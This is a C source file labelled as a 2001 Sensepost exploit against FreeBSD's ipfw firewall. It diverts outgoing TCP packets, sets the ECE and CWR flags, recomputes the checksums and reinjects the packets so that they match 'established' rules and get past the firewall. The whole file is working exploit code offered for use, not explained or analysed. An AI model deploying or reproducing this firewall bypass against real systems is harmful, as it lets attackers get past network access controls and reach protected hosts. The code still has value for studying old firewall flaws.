/*
 * FreeBSD ipfw + TCP ECE flag exploit.
 * Plathond for Sensepost 2001/01/25
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>

#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <machine/in_cksum.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/route.h>
#include <arpa/inet.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>

#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <machine/in_cksum.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/route.h>
#include <arpa/inet.h>

#include <alias.h>
#include <ctype.h>
#include <err.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>
#include <ctype.h>
#include <err.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>

/* Port the divert socket is bound to in main(). */
#define DIVERT_PORT 7000

#define FALSE 0
#define TRUE  1

/*
 * Fold the carries of a one's-complement accumulator into 16 bits and
 * yield the complemented 16-bit result.  NOTE: the argument is assigned
 * to (and evaluated several times), so pass a plain lvalue.
 */
#define CKSUM_CARRY(x) \
    ((x) = ((x) >> 16) + ((x) & 0xffff), (~((x) + ((x) >> 16)) & 0xffff))

typedef unsigned char Boolean;

/*
 * Single-packet state shared by handle_input() and flushpacket().
 */
static struct sockaddr_in paddr;         /* address filled in by recvfrom() */
static int psock = -1;                   /* socket with a pending write, or -1 */
static unsigned long plen = 0;           /* number of valid bytes in pbuf */
static unsigned char pbuf[IP_MAXPACKET]; /* packet buffer */

/* 
 * These are stolen from libnet.
 */
/*
 * Sum `len` bytes starting at `addr` as 16-bit words (libnet-derived).
 *
 * A trailing odd byte is added as a word whose first byte in memory is
 * that byte and whose second byte is zero.  The result is the raw,
 * unfolded sum; callers fold and complement it (see CKSUM_CARRY).
 * A `len` of zero or less yields 0.
 */
int in_cksum(u_short *addr, int len)
{
  u_short *cursor = addr;
  int remaining = len;
  int acc = 0;

  for (; remaining > 1; remaining -= 2)
    acc += *cursor++;

  if (remaining == 1) {
    u_short pad = 0;

    /* Copy the lone byte into the first byte of a zeroed word. */
    *(u_char *)&pad = *(u_char *)cursor;
    acc += pad;
  }

  return acc;
}

/*
 * Recompute the transport checksum of the IPv4 packet stored at `buf`.
 *
 * buf      - start of the IP header; ip_src/ip_dst are read from it and the
 *            TCP header is taken to start at buf + ip_hl * 4.
 * protocol - only IPPROTO_TCP is handled; any other value is a no-op.
 * len      - number of bytes covered by the TCP checksum (TCP header plus
 *            payload); handle_input() passes ip_len minus the IP header size.
 *
 * The IP header checksum is left untouched.
 */
void do_cksum(unsigned char *buf, int protocol, int len)
{
  struct ip *ip = (struct ip *)buf;
  unsigned long ip_hl = (unsigned long)ip->ip_hl << 2;
  unsigned long sum;
  struct tcphdr *tcp;

  if (protocol != IPPROTO_TCP)
    return;

  tcp = (struct tcphdr *)(buf + ip_hl);

  /* The checksum field must be zero while the checksum is computed. */
  tcp->th_sum = 0;

  /* Pseudo-header: the 8 bytes of ip_src followed by ip_dst ... */
  sum = in_cksum((u_short *)&ip->ip_src, 8);
  /* ... then protocol + TCP length, converted host -> network order. */
  sum += htons(IPPROTO_TCP + len);
  /* TCP header and payload. */
  sum += in_cksum((u_short *)tcp, len);

  tcp->th_sum = CKSUM_CARRY(sum);
}

/*
 * Write the pending packet (pbuf, plen bytes) back to the divert socket
 * `fd`, addressed to paddr as filled in by recvfrom() in handle_input().
 *
 * Transient failures (ENOBUFS, EINTR) leave psock set, so main()'s select()
 * loop retries once the socket is writable.  Success, a short write, or
 * any other error clears psock.  Errors are reported and the packet is
 * dropped, so a permanently failing packet is not resent in a busy loop.
 */
void flushpacket(int fd)
{
  ssize_t nR;

  nR = sendto(fd,
              pbuf,
              plen,
              0,
              (struct sockaddr *)&paddr,
              sizeof(paddr));

  if (nR < 0) {
    if (errno == ENOBUFS || errno == EINTR)
      return;                   /* transient: keep psock set and retry */
    if (errno == EMSGSIZE)
      fprintf(stderr, "Need to implement frag.\n");
    else
      fprintf(stderr, "Failed to write packet.\n");
  } else if ((unsigned long)nR != plen) {
    /* errno is meaningless here; the write was simply short. */
    fprintf(stderr, "Failed to write packet.\n");
  }

  /* Sent, or failed permanently: nothing is pending any more. */
  psock = -1;
}

void handle_input(int sock)
{
  int nR = 0;
  int addrsize = 0;
  struct ip *ip;
  Boolean fIsOutput = FALSE;
  unsigned int ip_hl = 0, tcp_hl = 0;
  unsigned int ip_data_len = 0;
  struct tcphdr *tcp = NULL;
  

  addrsize = sizeof(struct sockaddr_in);
  nR = recvfrom(sock, 
                pbuf, sizeof(pbuf), 0,
                (struct sockaddr *)&paddr,
                &addrsize);
  if (nR == -1) {
    if (errno != EINTR) 
      fprintf(stderr, "Warning : recvfrom() failed.\n");
    goto over;
  }
  ip = (struct ip *)pbuf;
  ip_hl = ip->ip_hl << 2;
  
  /* Check if this is input or output */
  if (paddr.sin_addr.s_addr == INADDR_ANY)
    fIsOutput = TRUE;
  else
    fIsOutput = FALSE;

  /* We are only handling TCP packets */
  if (ip->ip_p != IPPROTO_TCP)
    goto over;

  /* Get the TCP header */
  tcp = (struct tcphdr *) (pbuf + ip_hl);
  tcp_hl = tcp->th_off << 2;
  ip_data_len = ntohs(ip->ip_len) - ip_hl;
  /* Sanity check packet length */
  if (ip_data_len <= 0)
    goto over;

  /* Add ECE and CWR flags to TCP header */
  tcp->th_flags |= (0x40 | 0x80);
  /* Compute new checksum */
  do_cksum(pbuf, IPPROTO_TCP, ip_data_len);


  /* Write packet back */
  plen = nR;
  psock = sock;
  flushpacket(sock);

  over:
  return;
}

/*
 * Open a divert socket bound to DIVERT_PORT and process packets forever.
 *
 * Each loop iteration waits in select() for the divert socket to become
 * readable, or writable when a packet is pending (psock != -1).  A pending
 * packet is flushed first, then any new input is handled.  Exits with
 * status 1 if the socket cannot be created or bound, or if select() fails
 * with anything other than EINTR.
 */
int main(int argc, char **argv)
{
  int inoutsock;
  fd_set rfs, wfs;
  int fdmax;
  struct sockaddr_in addr;
  int rc;

  (void)argc;
  (void)argv;

  /* Create divert sockets */
  if ((inoutsock = socket(PF_INET, SOCK_RAW, IPPROTO_DIVERT)) == -1) {
    fprintf(stderr, "socket() failed, exiting\n");
    exit(1);
  }

  /* Bind socket.  Zero the whole struct first: on BSD it also has
   * sin_len and sin_zero, which must not be left uninitialized. */
  memset(&addr, 0, sizeof(addr));
  addr.sin_family      = AF_INET;
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
  addr.sin_port        = htons(DIVERT_PORT);

  if (bind(inoutsock,
           (struct sockaddr *)&addr,
           sizeof(struct sockaddr_in)) == -1) {
    fprintf(stderr, "Unable to bind socket, exiting\n");
    exit(1);
  }

  while (1) {
    FD_ZERO(&rfs);
    FD_ZERO(&wfs);

    if (psock != -1)
      FD_SET(psock, &wfs);
    FD_SET(inoutsock, &rfs);

    fdmax = (inoutsock > psock) ? inoutsock : psock;

    /* Select loop */
    rc = select(fdmax + 1, &rfs, &wfs, NULL, NULL);
    if (rc == -1) {
      if (errno == EINTR)
        continue;
      fprintf(stderr, "select() failed, exiting\n");
      exit(1);
    }

    /* Check for flush from previous packet */
    if (psock != -1 && FD_ISSET(psock, &wfs))
      flushpacket(psock);

    /* Do we have input available ? */
    if (FD_ISSET(inoutsock, &rfs))
      handle_input(inoutsock);
  }
}

/* spidermark sensepostdata ece*/